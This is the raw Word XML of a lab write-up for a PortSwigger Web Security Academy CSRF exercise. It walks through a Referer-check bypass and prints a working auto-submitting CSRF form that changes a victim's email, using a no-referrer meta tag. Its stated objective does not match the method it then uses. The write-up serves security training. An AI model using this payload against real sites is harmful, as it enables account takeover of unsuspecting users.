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2182" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
        <w:ind w:left="-1440" w:right="-1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy — Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C865F7B" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00D8371E">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A09B0B2" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="8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>Lab 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC93A7" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSRF with broken </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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8371E" w14:paraId="220932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323B" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20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BCA0" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8371E" w14:paraId="41E6D0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37A1" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab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F0E8" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8371E" w14:paraId="3EFFC1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C847" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Completed By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2A47" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Researcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8371E" w14:paraId="3BDC5E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84A" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Platform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F457" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Security Academy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1034B7ED" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00D8371E">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5180B26C" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Lab Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149C355" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="F39C12"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF9E7"/>
        <w:spacing w:after="200"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bypass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> validation by appending the allowed domain as a subdirectory in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D77583" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3F012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CSRF with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Validation Bypass – Step-by-Step PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD8EF9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>Step 1 — Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2B547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Open Burp Browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1684B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Login using lab credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAD6B1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>Step 2 — Change Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B2F25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Open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C9F8B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/my-account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45217023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Change your email address once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7C3FC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>Step 3 — Capture Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26866926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Open Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C9F0A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Go to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDFA02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Proxy → HTTP history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CDB1E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Find request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508EF72C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POST /my-account/change-email HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD4028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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C830AF5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POST /my-account/change-email HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A483D54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Host: 0aad00c00338455e8089a8e5008100fd.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065C81C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email=abc@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBAB91C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>Step 4 — Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C1FF7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Right-click request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A433ACC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Select:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20336573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Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7AF3C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 xml:space="preserve">Step 5 — Test </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A956B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Modify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E631731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Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: https://evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D8D3E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Send request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA04038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Observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC5CC3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Request rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760F9C6C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 xml:space="preserve">Step 6 — Remove </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF0D78A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Delete entire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589B028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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37E55D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POST /my-account/change-email HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71672422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Host: 0aad00c00338455e8089a8e5008100fd.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2163A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email=test@evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B7BE0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Send request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244BFAD2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Observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E217D8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Request accepted successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B96CDF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This confirms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499271B7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Server validates </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> only if present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122156FE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Missing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bypasses protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24131C20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>Step 7 — Create CSRF PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AC6E7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Open Exploit Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D4623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Paste payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E188BB9" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="E74C3C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&lt;meta name="referrer" content="no-referrer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB51E55" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="E74C3C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&lt;form action="https://0aad00c00338455e8089a8e5008100fd.web-security-academy.net/my-account/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355992D3" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="E74C3C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&lt;input type="hidden" name="email" value="freshvictim9981@evil.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48626A84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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D16D5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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81AACA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document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81F72E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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F46A7D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>Step 8 — Test Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA621E3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Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EF1A2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Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E38AA8B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Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF37668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View exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D123A6F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Observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58BF8B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Email changes automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8FDDA" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
        </w:rPr>
        <w:t>Step 9 — Final Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF838A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Change email to NEW unused email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40961BD3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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B64D8F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finalsolve2026@evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA53F8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Click Store again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0435F3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Click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96717C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Deliver to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C8374" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Lab solved successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BD813" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00D8371E">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BD3011" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots &amp; Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9A384" w14:textId="77777777" w:rsidR="00D837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DA184A" wp14:editId="0AE2922C">
            <wp:extent cx="5334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C04A" w14:textId="77777777" w:rsidR="00D8371E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>Figure 1: 1st Image Of Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07BFB5" w14:textId="77777777" w:rsidR="00D837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10E59CF" wp14:editId="0E981A0B">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267539007" name="Picture 267539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6117" w14:textId="77777777" w:rsidR="00D8371E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2: Find Teh Request And Send To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Repeter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34C449A9" w14:textId="618EF2A3" w:rsidR="00D8371E" w:rsidRDefault="00D8371E">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8588EE" w14:textId="77777777" w:rsidR="00D837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9B5995" wp14:editId="41C8A390">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185958177" name="Picture 18595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FC1C" w14:textId="77777777" w:rsidR="00D8371E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4: Login With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creditional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> And Change Mail Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBB58A" w14:textId="77777777" w:rsidR="00116FDB" w:rsidRDefault="00000000" w:rsidP="00116FDB">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49379DA9" wp14:editId="75A827C5">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1333090616" name="Picture 133309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F501" w14:textId="1D20EB9D" w:rsidR="00D8371E" w:rsidRDefault="00000000" w:rsidP="00116FDB">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Paylaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Body Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BBEFE" w14:textId="77777777" w:rsidR="00116FDB" w:rsidRDefault="00116FDB" w:rsidP="00116FDB">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="27AE60"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAFAF1"/>
        <w:spacing w:before="200" w:after="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
        </w:rPr>
        <w:t>Lab Solved — Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30517ED7" w14:textId="77777777" w:rsidR="00116FDB" w:rsidRPr="00116FDB" w:rsidRDefault="00116FDB" w:rsidP="00116FDB">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484E9740" w14:textId="77777777" w:rsidR="00116FDB" w:rsidRDefault="00116FDB">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD36D04" w14:textId="160A13DD" w:rsidR="00116FDB" w:rsidRDefault="00116FDB">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA8BDDC" wp14:editId="2D6F1221">
            <wp:extent cx="5331551" cy="2046514"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2082716664" name="Picture 2082716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069" cy="20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EFAC" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00D8371E">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F457D4" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="27AE60"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="27AE60"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAFAF1"/>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Status: SOLVED</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D8371E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41420" w14:textId="77777777" w:rsidR="00F12DF1" w:rsidRDefault="00F12DF1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5024F8E9" w14:textId="77777777" w:rsidR="00F12DF1" w:rsidRDefault="00F12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B20D" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="922B21"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CSRF with broken </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Referer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> validation  |  Page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PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00116FDB">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="56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0B884" w14:textId="77777777" w:rsidR="00F12DF1" w:rsidRDefault="00F12DF1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50A8471C" w14:textId="77777777" w:rsidR="00F12DF1" w:rsidRDefault="00F12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3490E" w14:textId="77777777" w:rsidR="00D8371E" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
      </w:pBdr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>PortSwigger</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> Academy PoC  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>CSRF — Lab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9A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E4A8A82"/>
    <w:lvl w:ilvl="0" w:tplc="02409A4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D72C65DE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="924E1D36">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FA648B26">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D530374C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B8DEC4F6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B1E4E8DC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FE7CA974">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="482C3B0A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FE034C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDA8EEF0"/>
    <w:lvl w:ilvl="0" w:tplc="06D0DD6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F41C693C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BB52D124">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ECF2C43C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C9C66E9C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C9A68A4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="74CE62DE">
      <w:numFmt w:val="decimal"/>
